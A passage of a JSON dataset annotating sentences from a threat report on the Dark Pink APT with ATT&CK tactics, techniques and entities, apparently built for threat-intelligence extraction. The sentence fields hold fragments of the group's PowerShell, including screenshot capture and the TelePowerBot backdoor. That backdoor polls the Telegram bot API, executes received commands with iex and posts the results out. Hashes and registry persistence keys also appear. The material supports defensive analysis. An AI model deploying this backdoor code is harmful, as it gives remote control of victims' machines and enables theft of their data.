"start": 3, "end": 15, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p21-s240-bb5c02", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 240, "context_before": "If network disk usage is found, they will begin exploring this disk to find files that may be of interest to them and potentially exfiltrate them.", "sentence_text": "In the prior section, we noted how Dark Pink threat actors carry out lateral movement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p21-s241-b4c9c0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 21, "sentence_id": 241, "context_before": "In the prior section, we noted how Dark Pink threat actors carry out lateral movement.", "sentence_text": "In this campaign, the threat 21/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s242-b6ed35", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 242, "context_before": "In this campaign, the threat 21/29", "sentence_text": "actors can also infect files on USB disks attached to the infected devices.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1091", "name": "Replication Through Removable Media" } ], "procedure": "Infect files on USB disks connected to compromised devices.", "entities": [ { "text": "infect files on USB disks attached to the infected devices", "start": 16, "end": 74, "label": "Action" }, { "text": "USB disks", "start": 32, "end": 41, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p22-s243-09ab81", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 243, "context_before": "actors can also infect files on USB disks attached to the infected devices.", "sentence_text": "The script below details how the threat actors compile a list of network shares and the removable devices connected to the machine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s245-cb7900", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 245, "context_before": "-ne", "sentence_text": "Users)-and($_.path -like", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s246-f4323f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 246, "context_before": "Users)-and($_.path -like", "sentence_text": "*:\\*)}).path;\n(Get-SMBMapping|?{$_.Status -eq", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s247-a96909", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 247, "context_before": "\"OK\"}).remotepath|?{$_ -notlike '*\\\\IPC$'} The threat actors can also issue a command to take a screenshot of the desktop of the compromised device and save these in the %TEMP% directory.", "sentence_text": "\"OK\"}).remotepath|?{$_ -notlike '*\\\\IPC$'} The threat actors can also issue a command to take a screenshot of the desktop of the compromised device and save these in the %TEMP% directory.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Capture screenshots from a compromised device and store them in the temporary directory.", "entities": [ { "text": "The threat actors", "start": 43, "end": 60, "label": "ThreatActor" }, { "text": "take a screenshot of the desktop of the compromised device and save these in the %TEMP% directory", "start": 89, "end": 186, "label": "Action" }, { "text": "%TEMP%", "start": 170, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p22-s248-6dbbe7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 248, "context_before": "They then download the images by issuing the below command.", "sentence_text": "They then download the images by issuing the below command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s249-454e25", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 249, "context_before": "They then download the images by issuing the below command.", "sentence_text": "Add-type -AssemblyName System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s250-a79cb9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 250, "context_before": "Add-type -AssemblyName System.", "sentence_text": "Drawing Add-Type -AssemblyName System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s255-463cac", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 255, "context_before": "Forms.", "sentence_text": "Screen]::AllScreens|%{ $bounds =$_.bounds;\nif($bounds.width -lt 1920){$bounds.width=1920} if($bounds.height -lt 1080){$bounds.height=1080} $image = New-Object Drawing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s256-2c9ebd", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 256, "context_before": "Screen]::AllScreens|%{ $bounds =$_.bounds;\nif($bounds.width -lt 1920){$bounds.width=1920} if($bounds.height -lt 1080){$bounds.height=1080} $image = New-Object Drawing.", "sentence_text": "Bitmap $bounds.width, $bounds.height $graphics = [Drawing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s257-6ba250", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 257, "context_before": "Bitmap $bounds.width, $bounds.height $graphics = [Drawing.", "sentence_text": "Graphics]::FromImage($image)\n$graphics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s258-d33a58", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 258, "context_before": "Graphics]::FromImage($image)\n$graphics.", "sentence_text": "CopyFromScreen($bounds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s259-b5aacd", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 259, "context_before": "CopyFromScreen($bounds.", "sentence_text": "Location, [Drawing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s260-7dfaec", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 260, "context_before": "Location, [Drawing.", "sentence_text": "Point]::Empty, $bounds.size)\n$screen_file = \"$env:tmp\\\\$($_.DeviceName.replace('\\\\\\\\.\\\\',''))_$((get- date).tostring('yyyyMMddHHmmss')).png\" $image.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s261-725b86", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 261, "context_before": "Point]::Empty, $bounds.size)\n$screen_file = \"$env:tmp\\\\$($_.DeviceName.replace('\\\\\\\\.\\\\',''))_$((get- date).tostring('yyyyMMddHHmmss')).png\" $image.", "sentence_text": "Save($screen_file)\n$graphics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s262-eec564", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 262, "context_before": "Save($screen_file)\n$graphics.", "sentence_text": "Dispose()\n$image.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s263-f1c665", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 263, "context_before": "Dispose()\n$image.", "sentence_text": "Dark Pink’s campaign once again underlines the massive dangers that spear-phishing campaigns pose for organizations, as even highly advanced threat actors use this vector to gain access to networks, and we recommend that organizations continue to educate their personnel on how to detect these sorts of emails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p22-s264-6ee0cd", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 22, "sentence_id": 264, "context_before": "Dark Pink’s campaign once again underlines the massive dangers that spear-phishing campaigns pose for organizations, as even highly advanced threat actors use this vector to gain access to networks, and we recommend that organizations continue to educate their personnel on how to detect these sorts of emails.", "sentence_text": "In line with Group-IB’s zero-tolerance policy to cybercrime, our analysts will continue their diligent efforts to uncover Dark Pink’s origin and work to uncover 22/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s265-dcbac7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 265, "context_before": "In line with Group-IB’s zero-tolerance policy to cybercrime, our analysts will continue their diligent efforts to uncover Dark Pink’s origin and work to uncover 22/29", "sentence_text": "more of the unique or peculiar TTPs utilized by this group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s266-58479b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 266, "context_before": "more of the unique or peculiar TTPs utilized by this group.", "sentence_text": "We will continue to issue proactive notifications to any organization we find to have been breached by this particular threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s267-dfab3f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 267, "context_before": "We will continue to issue proactive notifications to any organization we find to have been breached by this particular threat group.", "sentence_text": "Our clients are the first to be informed about Dark Pink, along with other new APT groups that may appear on the horizon, and they are also the first to obtain the names of compromised organizations, which helps them avoid supply- chain attacks and make their network infrastructure more secure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s268-5cb5d6", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 268, "context_before": "Our clients are the first to be informed about Dark Pink, along with other new APT groups that may appear on the horizon, and they are also the first to obtain the names of compromised organizations, which helps them avoid supply- chain attacks and make their network infrastructure more secure.", "sentence_text": "Recommendations\nUse modern email protection measures to prevent initial compromise via spear- phishing emails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s269-e473a8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 269, "context_before": "Recommendations\nUse modern email protection measures to prevent initial compromise via spear- phishing emails.", "sentence_text": "We recommend Group-IB’s Business Email Protection, which is able to counter these threats effectively.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s270-25cd73", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 270, "context_before": "We recommend Group-IB’s Business Email Protection, which is able to counter these threats effectively.", "sentence_text": "Organizations should ensure they foster a cybersecurity culture in their workplace, which includes sufficient training to staff on how to identify phishing emails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s271-8adb2e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 271, "context_before": "Organizations should ensure they foster a cybersecurity culture in their workplace, which includes sufficient training to staff on how to identify phishing emails.", "sentence_text": "Ensure that your security measures allow for proactive threat hunting that can help identify threats that cannot be detected automatically.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s272-7f6686", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 272, "context_before": "Ensure that your security measures allow for proactive threat hunting that can help identify threats that cannot be detected automatically.", "sentence_text": "Limit access to file-sharing resources, with the exception of those used within the organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s273-9a7b43", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 273, "context_before": "Limit access to file-sharing resources, with the exception of those used within the organization.", "sentence_text": "Monitor the creation of LNK files in unusual locations, such as network drives and USB devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s274-5f5328", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 274, "context_before": "Monitor the creation of LNK files in unusual locations, such as network drives and USB devices.", "sentence_text": "Ensure that you observe any use of commands and built-in tools that are frequently used for collecting information about the system and files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s275-41240d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 275, "context_before": "Ensure that you observe any use of commands and built-in tools that are frequently used for collecting information about the system and files.", "sentence_text": "Maintaining a secure organization requires ongoing vigilance, and using a proprietary solution such as Group-IB Threat Intelligence can help organizations shore up their security posture by equipping security teams with the latest insights into new and emerging threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s276-584e63", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 276, "context_before": "Maintaining a secure organization requires ongoing vigilance, and using a proprietary solution such as Group-IB Threat Intelligence can help organizations shore up their security posture by equipping security teams with the latest insights into new and emerging threats.", "sentence_text": "Try Group-IB Threat Intelligence now!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s277-67a1a1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 277, "context_before": "Try Group-IB Threat Intelligence now!", "sentence_text": "Optimize strategic, operational and tactical decision-making with best-in-class cyber threat analytics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s278-fa8a05", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 278, "context_before": "Optimize strategic, operational and tactical decision-making with best-in-class cyber threat analytics.", "sentence_text": "Request Threat Intelligence Demo right now!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p23-s279-973759", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 23, "sentence_id": 279, "context_before": "Request Threat Intelligence Demo right now!", "sentence_text": "Indicators of compromise File indicators:\n23/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p24-s280-76fc9c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 24, "sentence_id": 280, "context_before": "Indicators of compromise File indicators:\n23/29", "sentence_text": "Cucky: MD5: 926027F0308481610C85F4E3E433573B SHA1:\n24F65E0EE158FC63D98352F9828D014AB239AE16 SHA256:\n9976625B5A3035DC68E878AD5AC3682CCB74EF2007C501C8023291548E11301A Ctealer\nLoader: MD5: 728AFA40B20DF6D2540648EF845EB754 SHA1:\nD8DF672ECD9018F3F2D23E5C966535C30A54B71D SHA256:\nC60F778641942B7B0C00F3214211B137B683E8296ABB1905D2557BFB245BF775 Packed\nctealer: MD5: 7EAF1B65004421AC07C6BB1A997487B2 SHA1:\n18CA159183C98F52DF45D3E9DB0087E17596A866 SHA256:\nE3181EE97D3FFD31C22C2C303C6E75D0196912083D0C21536E5833EE7D108736 MD5:\n732091AD428419247BCE87603EA79F00 SHA1:\n142F909C26BD57969EF93D7942587CDF15910E34 SHA256:\nE45DF7418CA47A9A4C4803697F4B28C618469C6E5A5678213AB81DF9FCC9FD51\nFile path:\n$env:tmp\\backuplog $env:tmp\\backuplog1 $env:appdata\\archive.zip $env:appdata\\telegram.txt $env:tmp\\afkslfsa.csv $env:tmp\\AB.zip $Env:tmp\\AB", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p24-s281-462263", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 24, "sentence_id": 281, "context_before": "Cucky: MD5: 926027F0308481610C85F4E3E433573B SHA1:\n24F65E0EE158FC63D98352F9828D014AB239AE16 SHA256:\n9976625B5A3035DC68E878AD5AC3682CCB74EF2007C501C8023291548E11301A Ctealer\nLoader: MD5: 728AFA40B20DF6D2540648EF845EB754 SHA1:\nD8DF672ECD9018F3F2D23E5C966535C30A54B71D SHA256:\nC60F778641942B7B0C00F3214211B137B683E8296ABB1905D2557BFB245BF775 Packed\nctealer: MD5: 7EAF1B65004421AC07C6BB1A997487B2 SHA1:\n18CA159183C98F52DF45D3E9DB0087E17596A866 SHA256:\nE3181EE97D3FFD31C22C2C303C6E75D0196912083D0C21536E5833EE7D108736 MD5:\n732091AD428419247BCE87603EA79F00 SHA1:\n142F909C26BD57969EF93D7942587CDF15910E34 SHA256:\nE45DF7418CA47A9A4C4803697F4B28C618469C6E5A5678213AB81DF9FCC9FD51\nFile path:\n$env:tmp\\backuplog $env:tmp\\backuplog1 $env:appdata\\archive.zip $env:appdata\\telegram.txt $env:tmp\\afkslfsa.csv $env:tmp\\AB.zip $Env:tmp\\AB", "sentence_text": "Scheduled task name:\nMutex:\ngwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5\nRegistry path:\nHKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\nHKCU\\Environment\\OSBuild HKCU\\Environment\\STMP HKCU\\Environment\\SYSPS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p24-s282-5cf41b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 24, "sentence_id": 282, "context_before": "Scheduled task name:\nMutex:\ngwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5\nRegistry path:\nHKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\nHKCU\\Environment\\OSBuild HKCU\\Environment\\STMP HKCU\\Environment\\SYSPS", "sentence_text": "HKCR:\\zolfile\\shell\\open\\command HKCR:\\zolofile\\shell\\open\\command\\zolo HKCU:\\Environment\\guid HKCU:\\Environment\\Update", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p24-s283-2d8f52", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 24, "sentence_id": 283, "context_before": "HKCR:\\zolfile\\shell\\open\\command HKCR:\\zolofile\\shell\\open\\command\\zolo HKCU:\\Environment\\guid HKCU:\\Environment\\Update", "sentence_text": "HKCU:\\Environment\\UserInitMprLogonScript HKCU:\\SOFTWARE\\\\Classes\\\\abcdfile\\shell\\abcd\\ HKCU:\\SOFTWARE\\Classes\\.4ID\\ HKCU:\\SOFTWARE\\Classes\\.abcd HKCU:\\SOFTWARE\\Classes\\.psr HKCU:\\SOFTWARE\\Classes\\.zol HKCU:\\SOFTWARE\\Classes\\.zolo HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p24-s284-25d96f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 24, "sentence_id": 284, "context_before": "HKCU:\\Environment\\UserInitMprLogonScript HKCU:\\SOFTWARE\\\\Classes\\\\abcdfile\\shell\\abcd\\ HKCU:\\SOFTWARE\\Classes\\.4ID\\ HKCU:\\SOFTWARE\\Classes\\.abcd HKCU:\\SOFTWARE\\Classes\\.psr HKCU:\\SOFTWARE\\Classes\\.zol HKCU:\\SOFTWARE\\Classes\\.zolo HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\", "sentence_text": "HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute\\ HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\aaaa HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command 24/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s285-9ff1d0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 285, "context_before": "HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute HKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute\\ HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\aaaa HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command 24/29", "sentence_text": "HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\abcd\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\DelegateExecute\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command -Name", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s286-11e020", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 286, "context_before": "HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\abcd\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\DelegateExecute\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command -Name", "sentence_text": "DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\zolo HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s287-3723d7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 287, "context_before": "DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\zolo HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "sentence_text": "-Name DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s288-5359bf", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 288, "context_before": "-Name DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "sentence_text": "-Name DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s289-1f6c90", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 289, "context_before": "-Name DelegateExecute HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "sentence_text": "-Name zolo HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s290-222793", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 290, "context_before": "-Name zolo HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command", "sentence_text": "-Name zolo -Value HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command\\zolo HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Forfiles HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Psr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p25-s291-0c4f43", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 25, "sentence_id": 291, "context_before": "-Name zolo -Value HKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command\\zolo HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Forfiles HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Psr", "sentence_text": "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Recents APPENDIX A. TelePowerBot 25/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p26-s293-cdc385", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 26, "sentence_id": 293, "context_before": "[System.", "sentence_text": "Net.ServicePointManager]::SecurityProtocol=@(\"Tls12\",\"Tls11\",\"Tls\",\"Ssl3\")\n$token=\"CHANGED\"\n$id=CHANGED\n$mid=(gp \"HKCU:\\\\Environment\" -name Update).Update $guid = (gp \"HKCU:\\\\Environment\" -name guid).guid $ip=irm \"https://ifconfig.me/ip\" if( -not (New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p26-s295-9365bf", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 26, "sentence_id": 295, "context_before": "Threading.", "sentence_text": "Mutex($false, $guid)).WaitOne(1)){ exit } if($mid -and $guid){ irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?\nchat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip reconnected!\" } else { $guid = [guid]::NewGuid().guid Set-ItemProperty \"HKCU:\\\\Environment\" -name \"GUID\" -value $guid irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?\nchat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip new connection!\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p26-s296-946589", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 26, "sentence_id": 296, "context_before": "Mutex($false, $guid)).WaitOne(1)){ exit } if($mid -and $guid){ irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?\nchat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip reconnected!\" } else { $guid = [guid]::NewGuid().guid Set-ItemProperty \"HKCU:\\\\Environment\" -name \"GUID\" -value $guid irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?\nchat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip new connection!\"", "sentence_text": "} if($mid -isnot [int]){ $mid = 0 } while(1){ Start-Sleep 60;\n(irm -Uri \"https://api.telegram.org/bot$($token)/getUpdates\").result|%{ if ($mid -lt $_.update_id) { $mid=$_.update_id;\n$name,$task=$_.message.text -split \" :: \";\nif ( ($name -like $ip) -or ($name -like $env:COMPUTERNAME) -or ($name - like $guid) -or ($name -like \"all\")) { $message = $($task | iex)2>&1 | Out-String;\nif (\"\" -eq $message){ $message=\"Task Done!\" } $b=0;\nwhile ($b -lt $message.Length) { $c = 4000;\nif (($c + $b) -gt $message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p26-s297-c84f2d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 26, "sentence_id": 297, "context_before": "} if($mid -isnot [int]){ $mid = 0 } while(1){ Start-Sleep 60;\n(irm -Uri \"https://api.telegram.org/bot$($token)/getUpdates\").result|%{ if ($mid -lt $_.update_id) { $mid=$_.update_id;\n$name,$task=$_.message.text -split \" :: \";\nif ( ($name -like $ip) -or ($name -like $env:COMPUTERNAME) -or ($name - like $guid) -or ($name -like \"all\")) { $message = $($task | iex)2>&1 | Out-String;\nif (\"\" -eq $message){ $message=\"Task Done!\" } $b=0;\nwhile ($b -lt $message.Length) { $c = 4000;\nif (($c + $b) -gt $message.", "sentence_text": "Length){$c=$message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p26-s298-20a99e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 26, "sentence_id": 298, "context_before": "Length){$c=$message.", "sentence_text": "Length % 4000} irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?\nchat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip answer message :\n$($_.message.message_id)`n$($message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p26-s300-c48c24", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 26, "sentence_id": 300, "context_before": "Substring($b,$c))", "sentence_text": "\"\n$b+=$c\n}\n}\n}\nSet-ItemProperty \"HKCU:\\\\Environment\" -name \"Update\" -value $mid } } APPENDIX B. PowerShell script to later movement over removable device 26/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 